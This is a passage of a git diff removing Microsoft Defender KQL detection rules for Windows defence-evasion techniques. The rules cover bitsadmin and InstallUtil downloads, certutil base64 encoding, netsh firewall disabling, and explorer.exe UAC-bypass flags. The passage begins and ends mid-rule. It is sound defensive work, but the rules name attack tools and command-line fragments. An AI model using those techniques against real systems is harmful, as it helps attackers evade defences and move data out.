-| where ((FolderPath contains "\\$Recycle.bin\\" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Intel\\Logs\\" or FolderPath contains "\\RSA\\MachineKeys\\" or FolderPath contains "\\Users\\All Users\\" or FolderPath contains "\\Users\\Default\\" or FolderPath contains "\\Users\\NetworkService\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\addins\\" or FolderPath contains "\\Windows\\debug\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\Help\\" or FolderPath contains "\\Windows\\IME\\" or FolderPath contains "\\Windows\\Media\\" or FolderPath contains "\\Windows\\repair\\" or FolderPath contains "\\Windows\\security\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\") or FolderPath startswith "C:\\Perflogs\\") and (not(((FolderPath endswith "\\CitrixReceiverUpdater.exe" and FolderPath startswith "C:\\Windows\\SysWOW64\\config\\systemprofile\\Citrix\\UpdaterBinaries\\") or FolderPath startswith "C:\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Execution_of_Suspicious_File_Type_Extension.kql b/Defense Evasion/Execution_of_Suspicious_File_Type_Extension.kql
deleted file mode 100644
index 518a4a2d..00000000
--- a/Defense Evasion/Execution_of_Suspicious_File_Type_Extension.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2021/12/09
-// Level: medium
-// Description: Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process.
-This rule might require some initial baselining to align with some third party tooling in the user environment.
-
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (not((FolderPath endswith ".bin" or FolderPath endswith ".cgi" or FolderPath endswith ".com" or FolderPath endswith ".exe" or FolderPath endswith ".scr" or FolderPath endswith ".tmp"))) and (not((FolderPath contains ":\\$Extend\\$Deleted\\" or FolderPath contains ":\\Windows\\System32\\DriverStore\\FileRepository\\" or (FolderPath in~ ("-", "")) or (FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or FolderPath contains ":\\Windows\\Installer\\MSI" or (FolderPath contains ":\\Config.Msi\\" and (FolderPath endswith ".rbf" or FolderPath endswith ".rbs")) or isnull(FolderPath) or (InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\")))) and (not((InitiatingProcessFolderPath contains ":\\ProgramData\\Avira\\" or (FolderPath endswith "com.docker.service" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe") or FolderPath contains ":\\Program Files\\Mozilla Firefox\\" or FolderPath endswith "\\LZMA_EXE" or (FolderPath endswith ":\\Program Files (x86)\\MyQ\\Server\\pcltool.dll" or FolderPath endswith ":\\Program Files\\MyQ\\Server\\pcltool.dll") or (FolderPath contains "NVIDIA\\NvBackend\\" and FolderPath endswith ".dat") or ((FolderPath contains ":\\Program Files (x86)\\WINPAKPRO\\" or FolderPath contains ":\\Program Files\\WINPAKPRO\\") and FolderPath endswith ".ngn") or (FolderPath contains "\\AppData\\Local\\Packages\\" and FolderPath contains "\\LocalState\\rootfs\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Execution_via_WorkFolders.exe.kql b/Defense Evasion/Execution_via_WorkFolders.exe.kql
deleted file mode 100644
index aa865be5..00000000
--- a/Defense Evasion/Execution_via_WorkFolders.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxime Thiebaut (@0xThiebaut)
-// Date: 2021/10/21
-// Level: high
-// Description: Detects using WorkFolders.exe to execute an arbitrary control.exe
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (FolderPath endswith "\\control.exe" and InitiatingProcessFolderPath endswith "\\WorkFolders.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\control.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Execution_via_stordiag.exe.kql b/Defense Evasion/Execution_via_stordiag.exe.kql
deleted file mode 100644
index 7bc49c98..00000000
--- a/Defense Evasion/Execution_via_stordiag.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer (@austinsonger)
-// Date: 2021/10/21
-// Level: high
-// Description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\fltmc.exe") and InitiatingProcessFolderPath endswith "\\stordiag.exe") and (not((InitiatingProcessFolderPath startswith "c:\\windows\\system32\\" or InitiatingProcessFolderPath startswith "c:\\windows\\syswow64\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Explorer_NOUACCHECK_Flag.kql b/Defense Evasion/Explorer_NOUACCHECK_Flag.kql
deleted file mode 100644
index f23f2ead..00000000
--- a/Defense Evasion/Explorer_NOUACCHECK_Flag.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/23
-// Level: high
-// Description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks
-// Tags: attack.defense_evasion, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/NOUACCHECK" and FolderPath endswith "\\explorer.exe") and (not((InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Explorer_Process_Tree_Break.kql b/Defense Evasion/Explorer_Process_Tree_Break.kql
deleted file mode 100644
index 0193292f..00000000
--- a/Defense Evasion/Explorer_Process_Tree_Break.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber
-// Date: 2019/06/29
-// Level: medium
-// Description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,
-which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"
-
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where ProcessCommandLine contains "/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}" or (ProcessCommandLine contains "explorer.exe" and ProcessCommandLine contains " /root,")
\ No newline at end of file
diff --git a/Defense Evasion/Fax_Service_DLL_Search_Order_Hijack.kql b/Defense Evasion/Fax_Service_DLL_Search_Order_Hijack.kql
deleted file mode 100644
index 30f379f3..00000000
--- a/Defense Evasion/Fax_Service_DLL_Search_Order_Hijack.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: NVISO
-// Date: 2020/05/04
-// Level: high
-// Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
-// Tags: attack.persistence, attack.defense_evasion, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "ualapi.dll" and InitiatingProcessFolderPath endswith "\\fxssvc.exe") and (not(FolderPath startswith "C:\\Windows\\WinSxS\\"))
\ No newline at end of file
diff --git a/Defense Evasion/File_Deleted_Via_Sysinternals_SDelete.kql b/Defense Evasion/File_Deleted_Via_Sysinternals_SDelete.kql
deleted file mode 100644
index e6a60f52..00000000
--- a/Defense Evasion/File_Deleted_Via_Sysinternals_SDelete.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceFileEvents
-| where (FolderPath endswith ".AAA" or FolderPath endswith ".ZZZ") and (not(FolderPath endswith "\\Wireshark\\radius\\dictionary.alcatel-lucent.aaa"))
\ No newline at end of file
diff --git a/Defense Evasion/File_Deletion_Via_Del.kql b/Defense Evasion/File_Deletion_Via_Del.kql
deleted file mode 100644
index e572cd87..00000000
--- a/Defense Evasion/File_Deletion_Via_Del.kql	
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: frack113
-// Date: 2022/01/15
-// Level: low
-// Description: Detects execution of the builtin "del"/"erase" commands in order to delete files.
-Adversaries may delete files left behind by the actions of their intrusion activity.
-Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
-Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
-
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains " -f" or ProcessCommandLine contains " /f" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " -q" or ProcessCommandLine contains " /q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_Download_Using_ProtocolHandler.exe.kql b/Defense Evasion/File_Download_Using_ProtocolHandler.exe.kql
deleted file mode 100644
index 7413072b..00000000
--- a/Defense Evasion/File_Download_Using_ProtocolHandler.exe.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: frack113
-// Date: 2021/07/13
-// Level: medium
-// Description: Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\protocolhandler.exe" or ProcessVersionInfoOriginalFileName =~ "ProtocolHandler.exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_Download_Via_Bitsadmin.kql b/Defense Evasion/File_Download_Via_Bitsadmin.kql
deleted file mode 100644
index e877ea4a..00000000
--- a/Defense Evasion/File_Download_Via_Bitsadmin.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael Haag, FPT.EagleEye
-// Date: 2017/03/09
-// Level: medium
-// Description: Detects usage of bitsadmin downloading a file
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and (ProcessCommandLine contains " /transfer " or ((ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and ProcessCommandLine contains "http"))
\ No newline at end of file
diff --git a/Defense Evasion/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql b/Defense Evasion/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql
deleted file mode 100644
index c7fb9c33..00000000
--- a/Defense Evasion/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file to a suspicious target folder
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%public%") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql b/Defense Evasion/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql
deleted file mode 100644
index 7c74c2ea..00000000
--- a/Defense Evasion/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: medium
-// Description: Detects usage of bitsadmin downloading a file to uncommon target folder
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_Download_Via_InstallUtil.EXE.kql b/Defense Evasion/File_Download_Via_InstallUtil.EXE.kql
deleted file mode 100644
index 90991c2d..00000000
--- a/Defense Evasion/File_Download_Via_InstallUtil.EXE.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\InstallUtil.exe" or ProcessVersionInfoOriginalFileName =~ "InstallUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_Download_Via_Windows_Defender_MpCmpRun.EXE.kql b/Defense Evasion/File_Download_Via_Windows_Defender_MpCmpRun.EXE.kql
deleted file mode 100644
index c687fb97..00000000
--- a/Defense Evasion/File_Download_Via_Windows_Defender_MpCmpRun.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Matthew Matchen
-// Date: 2020/09/04
-// Level: high
-// Description: Detects the use of Windows Defender MpCmdRun.EXE to download files
-// Tags: attack.defense_evasion, attack.t1218, attack.command_and_control, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "DownloadFile" and ProcessCommandLine contains "url") and (ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe" or FolderPath endswith "\\MpCmdRun.exe" or ProcessCommandLine contains "MpCmdRun.exe" or ProcessVersionInfoFileDescription =~ "Microsoft Malware Protection Command Line Utility")
\ No newline at end of file
diff --git a/Defense Evasion/File_Encoded_To_Base64_Via_Certutil.EXE.kql b/Defense Evasion/File_Encoded_To_Base64_Via_Certutil.EXE.kql
deleted file mode 100644
index 2eefdfc1..00000000
--- a/Defense Evasion/File_Encoded_To_Base64_Via_Certutil.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/02/24
-// Level: medium
-// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_In_Suspicious_Location_Encoded_To_Base64_Via_Certutil.EXE.kql b/Defense Evasion/File_In_Suspicious_Location_Encoded_To_Base64_Via_Certutil.EXE.kql
deleted file mode 100644
index f034c2e4..00000000
--- a/Defense Evasion/File_In_Suspicious_Location_Encoded_To_Base64_Via_Certutil.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: high
-// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode") and (ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Local\\Temp\\" or ProcessCommandLine contains "\\PerfLogs\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "$Recycle.Bin") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql b/Defense Evasion/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql
deleted file mode 100644
index 03b37b13..00000000
--- a/Defense Evasion/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file with a suspicious extension
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".asax" or ProcessCommandLine contains ".ashx" or ProcessCommandLine contains ".asmx" or ProcessCommandLine contains ".asp" or ProcessCommandLine contains ".aspx" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cfm" or ProcessCommandLine contains ".cgi" or ProcessCommandLine contains ".chm" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jsp" or ProcessCommandLine contains ".jspx" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".psm1" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".scf" or ProcessCommandLine contains ".sct" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".war" or ProcessCommandLine contains ".wsf" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".xll" or ProcessCommandLine contains ".zip") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Files_With_System_Process_Name_In_Unsuspected_Locations.kql b/Defense Evasion/Files_With_System_Process_Name_In_Unsuspected_Locations.kql
deleted file mode 100644
index 252e71d1..00000000
--- a/Defense Evasion/Files_With_System_Process_Name_In_Unsuspected_Locations.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/05/26
-// Level: medium
-// Description: Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.).
-It is highly recommended to perform an initial baseline before using this rule in production.
-
-// Tags: attack.defense_evasion, attack.t1036.005
-DeviceFileEvents
-| where (FolderPath endswith "\\AtBroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\backgroundTaskHost.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmdl32.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dasHost.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventcreate.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\extrac32.exe" or FolderPath endswith "\\fontdrvhost.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\iscsicli.exe" or FolderPath endswith "\\iscsicpl.exe" or FolderPath endswith "\\logman.exe" or FolderPath endswith "\\LogonUI.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msinfo32.exe" or FolderPath endswith "\\mstsc.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regini.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\SearchFilterHost.exe" or FolderPath endswith "\\SearchIndexer.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\SecurityHealthService.exe" or FolderPath endswith "\\SecurityHealthSystray.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\ShellAppRuntime.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\SystemSettingsBroker.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\TiWorker.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\w32tm.exe" or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WerFaultSecure.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winrshost.exe" or FolderPath endswith "\\WinRTNetMUAHostServer.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wlrmdr.exe" or FolderPath endswith "\\WmiPrvSE.exe" or FolderPath endswith "\\wslhost.exe" or FolderPath endswith "\\WSReset.exe" or FolderPath endswith "\\WUDFHost.exe" or FolderPath endswith "\\WWAHost.exe") and (not((FolderPath endswith "C:\\Windows\\explorer.exe" or (FolderPath contains "\\SystemRoot\\System32\\" or FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\") or (InitiatingProcessFolderPath endswith "\\SecurityHealthSetup.exe" and FolderPath contains "C:\\Windows\\System32\\SecurityHealth\\" and FolderPath endswith "\\SecurityHealthSystray.exe") or (InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\msiexec.exe" and (FolderPath endswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or FolderPath endswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe")) or (InitiatingProcessFolderPath endswith "C:\\Windows\\system32\\svchost.exe" and FolderPath contains "C:\\Program Files\\WindowsApps\\") or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\wuauclt.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Filter_Driver_Unloaded_Via_Fltmc.EXE.kql b/Defense Evasion/Filter_Driver_Unloaded_Via_Fltmc.EXE.kql
deleted file mode 100644
index 3c11c9c1..00000000
--- a/Defense Evasion/Filter_Driver_Unloaded_Via_Fltmc.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali
-// Date: 2023/02/13
-// Level: high
-// Description: Detect filter driver unloading activity via fltmc.exe
-// Tags: attack.defense_evasion, attack.t1070, attack.t1562, attack.t1562.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "unload" and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe")) and (not(ProcessCommandLine endswith "unload rtp_filesystem_filter"))
\ No newline at end of file
diff --git a/Defense Evasion/Findstr_Launching_.lnk_File.kql b/Defense Evasion/Findstr_Launching_.lnk_File.kql
deleted file mode 100644
index 64018244..00000000
--- a/Defense Evasion/Findstr_Launching_.lnk_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Trent Liffick
-// Date: 2020/05/01
-// Level: medium
-// Description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack
-// Tags: attack.defense_evasion, attack.t1036, attack.t1202, attack.t1027.003
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".lnk" or ProcessCommandLine endswith ".lnk\"" or ProcessCommandLine endswith ".lnk'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/Defense Evasion/Firewall_Disabled_via_Netsh.EXE.kql b/Defense Evasion/Firewall_Disabled_via_Netsh.EXE.kql
deleted file mode 100644
index cd3e65d2..00000000
--- a/Defense Evasion/Firewall_Disabled_via_Netsh.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Fatih Sirin
-// Date: 2019/11/01
-// Level: medium
-// Description: Detects netsh commands that turns off the Windows firewall
-// Tags: attack.defense_evasion, attack.t1562.004, attack.s0108
-DeviceProcessEvents
-| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "opmode" and ProcessCommandLine contains "disable") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "state" and ProcessCommandLine contains "off"))
\ No newline at end of file
diff --git a/Defense Evasion/Firewall_Rule_Deleted_Via_Netsh.EXE.kql b/Defense Evasion/Firewall_Rule_Deleted_Via_Netsh.EXE.kql
deleted file mode 100644
index 327f798c..00000000
--- a/Defense Evasion/Firewall_Rule_Deleted_Via_Netsh.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/14
-// Level: medium
-// Description: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh
-// Tags: attack.defense_evasion, attack.t1562.004
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "delete ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not((ProcessCommandLine contains "name=Dropbox" and InitiatingProcessFolderPath endswith "\\Dropbox.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Firewall_Rule_Update_Via_Netsh.EXE.kql b/Defense Evasion/Firewall_Rule_Update_Via_Netsh.EXE.kql
deleted file mode 100644
index d08734e3..00000000
--- a/Defense Evasion/Firewall_Rule_Update_Via_Netsh.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/18
-// Level: medium
-// Description: Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains " firewall " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Folder_Removed_From_Exploit_Guard_ProtectedFolders_List_-_Registry.kql b/Defense Evasion/Folder_Removed_From_Exploit_Guard_ProtectedFolders_List_-_Registry.kql
deleted file mode 100644
index a504127b..00000000
--- a/Defense Evasion/Folder_Removed_From_Exploit_Guard_ProtectedFolders_List_-_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: high
-// Description: Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where ActionType =~ "DeleteValue" and RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\ProtectedFolders"
\ No newline at end of file
diff --git a/Defense Evasion/Forfiles.EXE_Child_Process_Masquerading.kql b/Defense Evasion/Forfiles.EXE_Child_Process_Masquerading.kql
deleted file mode 100644
index 90889ca1..00000000
--- a/Defense Evasion/Forfiles.EXE_Child_Process_Masquerading.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati
-// Date: 2024/01/05
-// Level: high
-// Description: Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.
-
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
